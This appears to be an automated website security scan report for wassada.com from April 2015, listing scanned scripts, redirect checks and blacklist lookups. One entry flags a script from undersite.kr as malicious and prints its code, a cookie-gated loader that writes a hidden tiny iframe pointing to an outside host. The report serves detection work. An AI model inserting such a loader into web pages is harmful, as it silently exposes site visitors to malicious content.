Scanned pages/files
Request | Server response | Status |
http://wassada.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 23 Apr 2015 08:11:17 GMT Location: http://www.wassada.com/ Server: Apache Vary: Accept-Encoding Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.wassada.com/ | 200 OK Content-Length: 73841 Content-Type: text/html | clean |
http://www.undersite.kr/data/qna/bb/1.js | 200 OK Content-Length: 296 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.cookie.indexOf('imbstvb=')==-1){ var expires=new Date();
expires.setTime(expires.getTime () +24*60*60*1000); document.cookie='imbstvb=Yes;path=/;expires='+expires.toGMTString(); document.write("<iframe src=http://www.undersite.kr/data/qna/bb/1.html width=10 height=10></iframe>");} Antivirus reports:
| ||
http://wassada.com/js/flash.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:30 GMT Location: http://www.wassada.com/js/flash.js Server: Apache Vary: Accept-Encoding Content-Length: 303 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:30 GMT | clean |
http://www.wassada.com/js/flash.js | 200 OK Content-Length: 2808 Content-Type: text/javascript | clean |
http://wassada.com/js/flash_new.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:39 GMT Location: http://www.wassada.com/js/flash_new.js Server: Apache Vary: Accept-Encoding Content-Length: 307 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:39 GMT | clean |
http://www.wassada.com/js/flash_new.js | 200 OK Content-Length: 2173 Content-Type: text/javascript | clean |
http://wassada.com/js/coupon.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:40 GMT Location: http://www.wassada.com/js/coupon.js Server: Apache Vary: Accept-Encoding Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:40 GMT | clean |
http://www.wassada.com/js/coupon.js | 200 OK Content-Length: 3855 Content-Type: text/javascript | clean |
http://wassada.com/js/mEmbed.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:42 GMT Location: http://www.wassada.com/js/mEmbed.js Server: Apache Vary: Accept-Encoding Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:42 GMT | clean |
http://www.wassada.com/js/membed.js | 404 Not Found Content-Length: 275 Content-Type: text/html | clean |
http://www.wassada.com/test404page.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://wassada.com/js/default.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:48 GMT Location: http://www.wassada.com/js/default.js Server: Apache Vary: Accept-Encoding Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:48 GMT | clean |
http://www.wassada.com/js/default.js | 200 OK Content-Length: 15842 Content-Type: text/javascript | clean |
http://wassada.com/js/cate_menupan.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:49 GMT Location: http://www.wassada.com/js/cate_menupan.js Server: Apache Vary: Accept-Encoding Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:49 GMT | clean |
http://www.wassada.com/js/cate_menupan.js | 200 OK Content-Length: 1351 Content-Type: text/javascript | clean |
http://wassada.com/js/happy_member.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:52 GMT Location: http://www.wassada.com/js/happy_member.js Server: Apache Vary: Accept-Encoding Content-Length: 310 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:52 GMT | clean |
http://www.wassada.com/js/happy_member.js | 200 OK Content-Length: 7804 Content-Type: text/javascript | clean |
http://wassada.com/js/change_menu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:53 GMT Location: http://www.wassada.com/js/change_menu.js Server: Apache Vary: Accept-Encoding Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:53 GMT | clean |
http://www.wassada.com/js/change_menu.js | 200 OK Content-Length: 601 Content-Type: text/javascript | clean |
http://wassada.com/js/happy_main.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:11:55 GMT Location: http://www.wassada.com/js/happy_main.js Server: Apache Vary: Accept-Encoding Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:11:55 GMT | clean |
http://www.wassada.com/js/happy_main.js | 200 OK Content-Length: 13032 Content-Type: text/javascript | clean |
http://wassada.com/js/searchWord.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=2419200 Connection: close Date: Thu, 23 Apr 2015 08:12:01 GMT Location: http://www.wassada.com/js/searchWord.js Server: Apache Vary: Accept-Encoding Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 21 May 2015 08:12:01 GMT | clean |
http://www.wassada.com/js/searchword.js | 404 Not Found Content-Length: 279 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wassada.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 23 Apr 2015 08:11:17 GMT
Location: http://www.wassada.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1
...292 bytes of data.
GET / HTTP/1.1
Host: wassada.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 23 Apr 2015 08:11:17 GMT
Location: http://www.wassada.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1
...292 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: wassada.com
Referer: http://www.google.com/search?q=wassada.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wassada.com
Referer: http://www.google.com/search?q=wassada.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wassada.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wassada.com/
Result: wassada.com is not infected or malware details are not published yet.
Result: wassada.com is not infected or malware details are not published yet.